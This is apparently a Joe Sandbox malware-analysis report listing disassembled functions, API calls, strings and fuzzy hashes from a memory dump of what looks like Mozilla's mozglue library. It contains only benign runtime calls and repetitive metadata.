Function 66627620 Relevance: 7.5, APIs: 5, Instructions: 35threadCOMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(0000002C,?,?,?,?,666275C4,?), ref: 6662762B

Part of subcall function 665ECA10: malloc.MOZGLUE(?), ref: 665ECA26

InitializeConditionVariable.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,666274D7,666315FC,?,?,?), ref: 66627644
GetCurrentThreadId.KERNEL32 ref: 6662765A
AcquireSRWLockExclusive.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,666274D7,666315FC,?,?,?), ref: 66627663
ReleaseSRWLockExclusive.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,666274D7,666315FC,?,?,?), ref: 66627677

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: ExclusiveLock$AcquireConditionCurrentInitializeReleaseThreadVariablemallocmoz_xmalloc
String ID:
API String ID: 418114769-0
Opcode ID: eaa2c90a1faa4f3916486ba4da8b5934524560ccd8ac33abdce92f581465c888
Instruction ID: eebd81d9f4248ae85f255a13f9bb19fc748d6e920074716182dfdb2074bd70f3
Opcode Fuzzy Hash: eaa2c90a1faa4f3916486ba4da8b5934524560ccd8ac33abdce92f581465c888
Instruction Fuzzy Hash: 06F02271D10386ABD700CF22D888676BB7AFFEA258F114316FA0443201E7B0A5D08BD0

Function 66631700 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 190COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 66631800

Part of subcall function 6660CBE8: GetCurrentProcess.KERNEL32(?,665D31A7), ref: 6660CBF1
Part of subcall function 6660CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,665D31A7), ref: 6660CBFA

Part of subcall function 665D4290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(66613EBD,66613EBD,00000000), ref: 665D42A9

Strings

Details, xrefs: 66631925
{marker.name} - {marker.data.name}, xrefs: 666318C7
name, xrefs: 66631939

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: Process$CurrentInit_thread_footerTerminatestrlen
String ID: Details$name${marker.name} - {marker.data.name}
API String ID: 46770647-1733325692
Opcode ID: c5e7b36922b2f56b378e9e680ec3a24f6b97acdf8f8b8642cf661cb8e1c0d8e6
Instruction ID: bbd5d56940b7ac09b591e360534240cde71b400903d8918ad29a761ae3c85414
Opcode Fuzzy Hash: c5e7b36922b2f56b378e9e680ec3a24f6b97acdf8f8b8642cf661cb8e1c0d8e6
Instruction Fuzzy Hash: 38711470900356AFCB04CF29E851B5AFFB2FF85304F408269D8155B341DB70AAA4CBE2

Function 6663B0C0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 188COMMON

Download Yara Rule

APIs

free.MOZGLUE(?,?,6663B0A6,6663B0A6,?,6663AF67,?,00000010,?,6663AF67,?,00000010,00000000,?,?,6663AB1F), ref: 6663B1F2
?_Xlength_error@std@@YAXPBD@Z.MSVCP140(map/set<T> too long,?,?,6663B0A6,6663B0A6,?,6663AF67,?,00000010,?,6663AF67,?,00000010,00000000,?), ref: 6663B1FF
free.MOZGLUE(?,?,?,map/set<T> too long,?,?,6663B0A6,6663B0A6,?,6663AF67,?,00000010,?,6663AF67,?,00000010), ref: 6663B25F

Strings

map/set<T> too long, xrefs: 6663B1FA

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: free$Xlength_error@std@@
String ID: map/set<T> too long
API String ID: 1922495194-1285458680
Opcode ID: 8600e1beecd2cda75b4529af97fd62cb4f05531b94c103dc19384352bee26e8a
Instruction ID: 916829e5e157b1dd65083e4fdcd8f9c463f1c224fa0e670ec619eaa64e421a6a
Opcode Fuzzy Hash: 8600e1beecd2cda75b4529af97fd62cb4f05531b94c103dc19384352bee26e8a
Instruction Fuzzy Hash: 5C616874A006559FD701CF18E980A9ABBE2FF6A318F18C199D859AB352C331EC55CF91

Function 665FD468 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 145COMMON

Download Yara Rule

APIs

Part of subcall function 6660CBE8: GetCurrentProcess.KERNEL32(?,665D31A7), ref: 6660CBF1
Part of subcall function 6660CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,665D31A7), ref: 6660CBFA

EnterCriticalSection.KERNEL32(6665E784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6660D1C5), ref: 665FD4F2
LeaveCriticalSection.KERNEL32(6665E784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6660D1C5), ref: 665FD50B

Part of subcall function 665DCFE0: EnterCriticalSection.KERNEL32(6665E784), ref: 665DCFF6
Part of subcall function 665DCFE0: LeaveCriticalSection.KERNEL32(6665E784), ref: 665DD026

InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6660D1C5), ref: 665FD52E
EnterCriticalSection.KERNEL32(6665E7DC), ref: 665FD690
LeaveCriticalSection.KERNEL32(6665E784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6660D1C5), ref: 665FD751

Strings

MOZ_CRASH(), xrefs: 665FD4BB

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: CriticalSection$EnterLeave$Process$CountCurrentInitializeSpinTerminate
String ID: MOZ_CRASH()
API String ID: 3805649505-2608361144
Opcode ID: ad1f3fe8856ea40c95169e41b6cdc908e9f3bfda50582b3d925d8ef4015f707c
Instruction ID: ecd6b0d1d5017e9ae8bd9e8ccb495ac120cdb643ce0369c08650e42e1bee4c7b
Opcode Fuzzy Hash: ad1f3fe8856ea40c95169e41b6cdc908e9f3bfda50582b3d925d8ef4015f707c
Instruction Fuzzy Hash: D0510371A047518FD758CF29C49271ABBE2EBC9700F154A2EE69AC7784E770E801CF52

Function 66624630 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 138COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 66624721

Strings

., xrefs: 6662476A
-%llu, xrefs: 66624733
profiler-paused, xrefs: 666246E4

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: __aulldiv
String ID: -%llu$.$profiler-paused
API String ID: 3732870572-2661126502
Opcode ID: 822673e3ff9e1f6bde3dd6fccba63de424fd7814d99de65a6c35640f5ae8c401
Instruction ID: 67c0d12f6705dc5497bbfc4356465bda218866529418aa63abe1dc0352d9dd15
Opcode Fuzzy Hash: 822673e3ff9e1f6bde3dd6fccba63de424fd7814d99de65a6c35640f5ae8c401
Instruction Fuzzy Hash: 0B412671E047189BCB08DF79F89115ABBEAEBC5744F10863EE9556B281EB709840CB91

Function 66649830 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

??0PrintfTarget@mozilla@@IAE@XZ.MOZGLUE ref: 6664985D
?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(?,?), ref: 6664987D
MOZ_CrashPrintf.MOZGLUE(ElementAt(aIndex = %zu, aLength = %zu),?,?), ref: 666498DE

Strings

ElementAt(aIndex = %zu, aLength = %zu), xrefs: 666498D9

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: Printf$Target@mozilla@@$?vprint@Crash
String ID: ElementAt(aIndex = %zu, aLength = %zu)
API String ID: 1778083764-3290996778
Opcode ID: 2e4288ff6c4aa21afca8c194bf3d7af303e29f919062d0f2a977a99f1ee51653
Instruction ID: 1109b262f517355fb2392ff8277c19be0c1fab7c31bca150e674df2ffe800061
Opcode Fuzzy Hash: 2e4288ff6c4aa21afca8c194bf3d7af303e29f919062d0f2a977a99f1ee51653
Instruction Fuzzy Hash: 50310571A001086FDB18AF59EC459AF7FA9DF88318F50843DEA1A9B340DB7159108BE5

Function 666246E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 115COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 66624721

Part of subcall function 665D4410: __stdio_common_vsprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,66613EBD,00000017,?,00000000,?,66613EBD,?,?,665D42D2), ref: 665D4444

Strings

., xrefs: 6662476A
-%llu, xrefs: 66624733
profiler-paused, xrefs: 666246E4

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: __aulldiv__stdio_common_vsprintf
String ID: -%llu$.$profiler-paused
API String ID: 680628322-2661126502
Opcode ID: 433d815581e95640c35a66689fec5d0bd5b0828fe70e378836baea0b9ffefeb0
Instruction ID: b7a7352e9b133f038f62b9d942d150a1e147429ba9ac0da01626e09ac7f89e0a
Opcode Fuzzy Hash: 433d815581e95640c35a66689fec5d0bd5b0828fe70e378836baea0b9ffefeb0
Instruction Fuzzy Hash: 6831F671F042185BCB0CCF6DE89169DBFEA9BC9314F15853EE8159B381EBB49804CB90

Function 6662B410 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 104stringCOMMON

Download Yara Rule

APIs

Part of subcall function 665D4290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(66613EBD,66613EBD,00000000), ref: 665D42A9

tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6662B463
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6662B4C9
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(FFFFFFFF,pid:,00000004), ref: 6662B4E4

Strings

pid:, xrefs: 6662B4DE

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: _getpidstrlenstrncmptolower
String ID: pid:
API String ID: 1720406129-3403741246
Opcode ID: b09a9cf059ce6ecf42ae0f74284384e74629aa41522c368f1a89a38604de10cd
Instruction ID: cc224d0689916a32cd72b7b7622dd900714f00fc1a8b53274fbc5b51b9be9880
Opcode Fuzzy Hash: b09a9cf059ce6ecf42ae0f74284384e74629aa41522c368f1a89a38604de10cd
Instruction Fuzzy Hash: F0312631E00219DFDB00DFA9F880AAEBBBAFF45318F440529D9116B241D732A955CFE1

Function 665EBF00 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 52COMMON

Download Yara Rule

APIs

??0ios_base@std@@IAE@XZ.MSVCP140(?,?,?,?,66637A3F), ref: 665EBF11
?init@?$basic_ios@DU?$char_traits@D@std@@@std@@IAEXPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@_N@Z.MSVCP140(?,00000000,?,66637A3F), ref: 665EBF5D
??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140(?,66637A3F), ref: 665EBF7E

Strings

df, xrefs: 665EBF84

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: U?$char_traits@$D@std@@@std@@$??0?$basic_streambuf@??0ios_base@std@@?init@?$basic_ios@D@std@@@2@_V?$basic_streambuf@
String ID: df
API String ID: 4279176481-826125786
Opcode ID: a1fad67fd7993478d4df3d5a61b9b74fa3a9207a268591bc7fc2a4b72915de7f
Instruction ID: 378835e070ecd5b3e024eccff5abaae49971be7153878230a3aec153cb8491c4
Opcode Fuzzy Hash: a1fad67fd7993478d4df3d5a61b9b74fa3a9207a268591bc7fc2a4b72915de7f
Instruction Fuzzy Hash: 3D11CDB82006548FC729DF0CE598926FBF9FF59708315885DEA8A8B750CB32AC00CF90

Function 665DF100 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 49libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(shell32,?,6664D020), ref: 665DF122
GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 665DF132

Strings

shell32, xrefs: 665DF11D
SHGetKnownFolderPath, xrefs: 665DF12C

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: SHGetKnownFolderPath$shell32
API String ID: 2574300362-1045111711
Opcode ID: 31460b48f89d00dcec0d45b0b7a005a22aa2ecf232255a276cc7585bd9fd804b
Instruction ID: b879d9f198af16f6a0e10eedb3b68cbf19b11e905218fabd6b0ed79a8f0ffd90
Opcode Fuzzy Hash: 31460b48f89d00dcec0d45b0b7a005a22aa2ecf232255a276cc7585bd9fd804b
Instruction Fuzzy Hash: 7C0152716002259BDF14CF6AEC59A5B7BA9FFCA694B404028E949D7240D730AA00CBE4

Function 6661E550 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6661E577
AcquireSRWLockExclusive.KERNEL32(6665F4B8), ref: 6661E584
ReleaseSRWLockExclusive.KERNEL32(6665F4B8), ref: 6661E5DE
?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6661E8A6

Strings

MOZ_PROFILER_STARTUP_FILTERS, xrefs: 6661E826, 6661E850
MOZ_PROFILER_STARTUP_FEATURES_BITFIELD, xrefs: 6661E777
MOZ_PROFILER_STARTUP, xrefs: 6661E5A1, 6661E5CC, 6661E5FF, 6661E62A
MOZ_PROFILER_STARTUP_ENTRIES, xrefs: 6661E655
MOZ_PROFILER_STARTUP_INTERVAL, xrefs: 6661E722, 6661E750, 6661E7A2

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadXbad_function_call@std@@
String ID: MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL
API String ID: 1483687287-53385798
Opcode ID: 69ce64e731a4989fd7f88368595c0fc216a42cf2fc6bbd6f61ef0448d5091a8a
Instruction ID: 0b444e024c67ecdc6e9ab27e5cc066d971584a849acfaafd4e1b489110871050
Opcode Fuzzy Hash: 69ce64e731a4989fd7f88368595c0fc216a42cf2fc6bbd6f61ef0448d5091a8a
Instruction Fuzzy Hash: F911A1319042A4DFCB00DF1AE94AA6AFBE7FBC9328F410519E94597241C770A814CFD1

Function 6663A3C0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 665E9830: free.MOZGLUE(?,?,?,66637ABE), ref: 665E985B

??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140 ref: 6663A3FD
??1ios_base@std@@UAE@XZ.MSVCP140 ref: 6663A405
free.MOZGLUE(?), ref: 6663A412

Part of subcall function 665F5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 665F5EDB
Part of subcall function 665F5E90: memset.VCRUNTIME140(ewcf,000000E5,?), ref: 665F5F27
Part of subcall function 665F5E90: LeaveCriticalSection.KERNEL32(?), ref: 665F5FB2

Strings

df, xrefs: 6663A3ED

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: CriticalSectionfree$??1?$basic_streambuf@??1ios_base@std@@D@std@@@std@@EnterLeaveU?$char_traits@memset
String ID: df
API String ID: 792927661-826125786
Opcode ID: 9ac7a870afb12a225da3bd047fa18265db6bca70a18a82e49b74e00c1398602f
Instruction ID: f5485b707b8590e539d100dab738db73eceddc61ac965eda9a2cbd900813251e
Opcode Fuzzy Hash: 9ac7a870afb12a225da3bd047fa18265db6bca70a18a82e49b74e00c1398602f
Instruction Fuzzy Hash: CEF06875A002548FDB04DF49EC999BEBB65FF85308B00446DD9159B355D731AD09CB81

Function 6660AB89 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6665E370,?,?,?,665D34DE,6665F6CC,?,?,?,?,?,?,?,665D3284), ref: 6660AB94
LeaveCriticalSection.KERNEL32(6665E370,?,665D34DE,6665F6CC,?,?,?,?,?,?,?,665D3284,?,?,665F56F6), ref: 6660ABD1

Strings

pef, xrefs: 6660AB8E

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: pef
API String ID: 3168844106-615027820
Opcode ID: 2dbc90294e6df5496a0f95e6bdfb2d727fef23ffea659c19663d4547c7889f4f
Instruction ID: 9d2a3ab53532a33f7806ccf3f642eac25c878953ec2597adcb39bddf6bc0a77c
Opcode Fuzzy Hash: 2dbc90294e6df5496a0f95e6bdfb2d727fef23ffea659c19663d4547c7889f4f
Instruction Fuzzy Hash: ABF0E231500298CFCB149F19F505B547B77FB827B1F10066DE655432D1CB302891CA50

Function 6660CBE8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,665D31A7), ref: 6660CBF1
TerminateProcess.KERNEL32(00000000,00000003,?,665D31A7), ref: 6660CBFA

Strings

: (malloc) Error in VirtualFree(), xrefs: 6660D001
<jemalloc>, xrefs: 6660CFFC

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: Process$CurrentTerminate
String ID: : (malloc) Error in VirtualFree()$<jemalloc>
API String ID: 2429186680-2186867486
Opcode ID: 6810f7f405896bc014127ed03841def244db21d1350f4dbc12136883cca8f915
Instruction ID: 46b86350af0ca1da6042ab7ec65d88854a9badca45845e8794f9170c890547a8
Opcode Fuzzy Hash: 6810f7f405896bc014127ed03841def244db21d1350f4dbc12136883cca8f915
Instruction Fuzzy Hash: 78B092B04043189BDB11ABA6E82EB093B6FB789A01F080828A30182241CBB9A1008E61

Function 665E2272 Relevance: 6.6, APIs: 5, Instructions: 360COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,?), ref: 665E237F
memcpy.VCRUNTIME140(?,?,00010000), ref: 665E2B9C

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 559ad2408d6b07325d5c8ac65b66d8feef6072b103ea96732fb3c9923b3b5bd1
Instruction ID: 7cd75ac0594d4b929b0fcf5bf129ce1f6c0a2224487663d8fb0571c5fbf800f5
Opcode Fuzzy Hash: 559ad2408d6b07325d5c8ac65b66d8feef6072b103ea96732fb3c9923b3b5bd1
Instruction Fuzzy Hash: B4E16C71A002069FDB08CF59C9D1A9EBBB2FF88314F198169E9499B349D771EC85CF90

Function 66620C90 Relevance: 6.3, APIs: 5, Instructions: 99stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 66620CD5

Part of subcall function 6660F960: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6660F9A7

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 66620D40
free.MOZGLUE ref: 66620DCB

Part of subcall function 665F5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 665F5EDB
Part of subcall function 665F5E90: memset.VCRUNTIME140(ewcf,000000E5,?), ref: 665F5F27
Part of subcall function 665F5E90: LeaveCriticalSection.KERNEL32(?), ref: 665F5FB2

free.MOZGLUE ref: 66620DDD
free.MOZGLUE ref: 66620DF2

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: free$CriticalSectionstrlen$EnterImpl@detail@mozilla@@LeaveMutexmemset
String ID:
API String ID: 4069420150-0
Opcode ID: 9a6a49d351181f2fa5be8df9fa8bbbd0e57b104cd74dc614b900dea3c0e391dc
Instruction ID: 5e9de33b077a2bdbe345268c40ba11a4dfa20b33bcb2eab7a7884e060d47a703
Opcode Fuzzy Hash: 9a6a49d351181f2fa5be8df9fa8bbbd0e57b104cd74dc614b900dea3c0e391dc
Instruction Fuzzy Hash: F84136719187448BD720CF29D48079AFBE5BFD9710F518A2EE8D887350DB70A885CF82

Function 66629120 Relevance: 6.3, APIs: 5, Instructions: 98COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,66628242,?,00000000,?,6661B63F), ref: 66629188
